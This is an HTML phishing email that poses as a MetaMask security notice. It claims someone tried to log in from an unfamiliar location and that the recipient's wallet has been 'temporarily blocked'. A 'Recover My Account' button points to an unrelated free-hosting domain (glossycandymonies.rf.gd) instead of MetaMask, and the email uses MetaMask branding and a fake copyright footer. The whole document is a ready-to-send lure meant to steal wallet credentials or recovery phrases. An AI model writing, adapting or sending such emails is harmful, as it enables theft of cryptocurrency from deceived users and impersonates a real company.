<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Important Notice</title>
    <style>
        body {
            font-family: 'Helvetica Neue', Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }

        .email-container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
        }

        .ledger-logo {
            display: block;
            margin: 0 auto 10px;
            max-width: 200px;
        }

        .email-header {
            text-align: center;
            border-bottom: 1px solid #e8e8e8;
            padding-bottom: 10px;
            margin-bottom: 20px;
        }

        .email-content p {
            line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0;
        }

        .alert-text {
            background-color: #FFEBEB;
            padding: 10px;
            margin: 20px 0;
            border: 1px solid #FF5300;
            border-radius: 5px;
            color: #d93a00;
        }

        .recover-button {
            display: block;
            width: 100%;
            max-width: 250px;
            margin: 30px auto;
            text-align: center;
            padding: 10px 15px;
            background-color: #FF5300;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: 600;
            letter-spacing: 0.5px;
            transition: background-color 0.3s;
        }

        .recover-button:hover, .recover-button:focus {
            background-color: #d93a00;
        }

        .footer-text {
            font-size: 12px;
            color: #888;
            text-align: center;
            margin-top: 40px;
        }

        /* Media Queries for Responsiveness */
        @media screen and (max-width: 640px) {
            .email-container {
                padding: 15px;
            }

            .ledger-logo {
                max-width: 150px;
            }

            .email-header h2 {
                font-size: 20px;
            }
        }

    </style>
</head>

<body style="font-family: 'Helvetica Neue', Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0">
    <div style="max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05)" class="email-container">
        <div style="text-align: center;
            border-bottom: 1px solid #e8e8e8;
            padding-bottom: 10px;
            margin-bottom: 20px" class="email-header">

            <h2><img width="222" height="122" align="middle" style="border-color: rgb(0, 0, 0);" src="https://1000logos.net/wp-content/uploads/2022/05/MetaMask-Emblem.png"></h2>
          <h2><br></h2>
        </div>
        <div class="email-content">
            <p style="line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0">Dear Customer,</p>
            <p style="line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0">We noticed that someone just tried to log in to your MetaMask from location you have not used before, so we want to make sure it's really you.</p>
            <div style="background-color: #FFEBEB;
            padding: 10px;
            margin: 20px 0;
            border: 1px solid #FF5300;
            border-radius: 5px;
            color: #d93a00" class="alert-text">
                Your account and your wallet have been temporarily blocked to prevent you from losing your assets.
            </div>
            <h3>How can I recover my account?</h3>
            <ol>
                <li>Click and follow the instructions to recover your account and unblock it.</li>
                <li>After completing the process, enable Two-Factor Authentication.</li>
            </ol>
            <a style="display: block;
            width: 100%;
            max-width: 250px;
            margin: 30px auto;
            text-align: center;
            padding: 10px 15px;
            background-color: #FF5300;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: 600;
            letter-spacing: 0.5px;
            transition: background-color 0.3s" class="recover-button" href="https://glossycandymonies.rf.gd/">Recover My Account</a>
        </div>
        <div style="font-size: 12px;
            color: #888;
            text-align: center;
            margin-top: 40px" class="footer-text">
            © 2024 MetaMask. All rights reserved.
        </div>
    </div>



</body></html>